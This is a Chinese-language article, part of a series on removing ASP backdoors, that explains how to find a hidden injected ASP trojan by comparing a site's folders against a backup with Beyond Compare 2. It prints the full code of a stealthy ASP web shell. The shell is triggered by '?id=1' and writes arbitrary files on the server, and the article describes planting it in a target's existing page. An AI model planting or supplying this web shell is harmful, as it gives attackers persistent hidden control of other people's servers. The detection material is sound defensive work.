asp后门、asp木马大清理（2）

三．技巧3：用Beyond Compare 2进行对比

上面的利用FTP客户端对比文件的方法，虽然有效，但是遇到渗透入文件的asp木马，那就无能为力了，这里介绍一款渗透性asp木马，可以将代码插入到指定web文件中，平常情况下不会显示，只有使用触发语句才能打开asp木马，其隐蔽性非常高。代码如下：

〈％ 

on error resume next 

id=request("id") 

if request("id")=1 then 

testfile=Request.form("name") 

msg=Request.form("message") 

set fs=server.CreatObject("scripting.filesystemobject") 

set thisfile=fs.openTestFile(testfile,8,True,0) 

thisfile.Writeline(""&msg&"") 

thisfile.close 

set fs=nothing 

％〉 

〈from method="post" Action="保存"?id=1〉 

〈input type="text" size="20" name="Name" 

Value=〈％=server.mappath("XP.ASP")％〉〉 

〈textarea name="Message" class=input〉 


〈/textarea〉 

〈input type="Submit" name="send" Value="生成" 

class=input〉 

〈/from〉 

〈％end if％〉 

注意：在修改目标主机的web文件时，要注意这样的文件修改后没有效果，即含有类似于：〈!--#include file="inc/conn.asp"--〉这样的文件包含命令，这样的代码存在时，加入asp代码后根本不会显示出脚本后门，但是脚本后门代码不会影响原文件的显示和功能。

假如已经对目标服务器www.target.com下的一个editor_InsertPic.asp文件进行了修改，插入了脚本后门代码，那么打开的方式是：www. target..com/editor_InsertPic.asp?id=1,注意后门的字符?id=1，有了这些字符，才能保证脚本后门显示出来！普通情况下打开www. target..com/editor_InsertPic.asp?id=1，是不会露出破绽的。

这招真是asp木马放置中非常狠的，如果遇到这样的情况，该怎么办？我们可以利用一款专业的文件对比工具Beyond Compare 2来完成木马的查找。

Beyond Compare 2一款不可多得的专业级的文件夹和文件对比工具。使用它可以很方便的对比出两个文件夹或者文件的不同之处。并把相差的每一个字节用颜色加以表示，查看方便。并且支持多种规则对比。

看我来利用它完成渗透性asp木马的查找。

步骤1：打开Beyond Compare 2，点工具栏中的“比较任务”，选择其中的选项：新建，在“比较模式”中选择“比较两个文件夹”。进入一下步，选择需要对比的两个文件夹路径，即备份过的网站文件以及从FTP上下载的网站文件，再在下面的“文件过滤器”中选择“包括所有文件”。在“比较范围”中选择“文件大小”。设置完毕即可开始比较。

步骤2：比较完毕，软件界面左右两边分别显示了比较的结果，从中可以很容易找到哪个目录多出了什么文件。

步骤3：文件名相同，但是大小不同的文件，会被软件用另外的颜色标注出来，选择上它们，然后选择工具栏的“操作”中的“比较内容”功能，即可展开两个文件的详细内容，从中我们可以看到FTP端的文件 * 入了渗透asp木马。这下很容易找到了吧！